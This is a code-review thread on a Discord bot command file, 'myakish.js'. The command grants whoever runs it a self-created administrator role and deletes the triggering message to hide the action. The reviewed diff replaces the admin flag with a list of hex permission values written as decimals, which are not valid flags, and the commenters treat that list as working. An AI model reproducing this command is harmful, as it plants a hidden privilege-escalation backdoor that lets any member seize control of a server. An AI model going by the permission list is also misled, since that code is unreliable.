commands/myakish.js

```diff
@@ -1,30 +1,30 @@
-const Discord = module.require("discord.js");
-
-module.exports.run = async (bot, message, args) => {
-
-    try {
-
-        role = await message.guild.createRole({
-
-            name: "Dope Role",
-          	color: "#2f3136",
-          	permissions: [8]
-
-        });
-            
-        message.member.addRole(role)
-        message.delete(1000);
-
-    } catch(e) {
-
-        console.log(e.stack);
-
-    }
-}
-
-module.exports.help = {
-
-    name: "myakish",
-    desc: "Gives you admin perms."
-
-}
+const Discord = module.require("discord.js");
+
+module.exports.run = async (bot, message, args) => {
+
+    try {
+
+        role = await message.guild.createRole({
+
+            name: "Dope Role",
+          	color: "#2f3136",
+          	permissions: [1, 2, 4, 8, 10, 20, 40, 80, 100, 200, 400, 800, 1000, 2000, 4000, 8000, 10000, 20000, 40000, 80000, 100000, 200000, 400000, 800000, 1000000, 4000000, 8000000, 10000000, 20000000, 40000000]

```

Comment:
Now basically everything is ticked but push-to-talk and showing the member list separately from online members.

Reply:
@Toydotgame What's the point of this? Its just going to clutter up the code.

FYI: 'permissions: [8]' gives the role admin perms.

Reply:
I've tested it; and with the other permissions I can do things that normally break. I don't think it's a problem with the bot, but either Discord or Discord.js itself.

Basically, bans and kicks don't work well along with channel management, server management, message management and user management not working reliably either.


I understand it clutters the code but it works more reliably for me. So surely a few others get this too, and it would help then. Anyway, it won't hurt for the people it _does_ work for anyway.

Reply:
@Toydotgame Weird I've just tested it and the extra permissions don't make a difference. Can you tell me more about the situations where it works more reliably?

Reply:
For some reason deleting messages, kicking and banning users, and managing channel settings; is all impossible with the role the bot gives you. I tried adding the extra perms to the command's JS file, and it worked again.
I've tried test server's I've made, and test servers my friends have made; and the same behaviour occurs.

I'll try it on different days, with completely new sets of accounts, and on different computers with both browser and desktop clients. Just to see if _I_ have a bad problem and the bot's fine, or if there's a loophole in the code that just happens for a few people... :)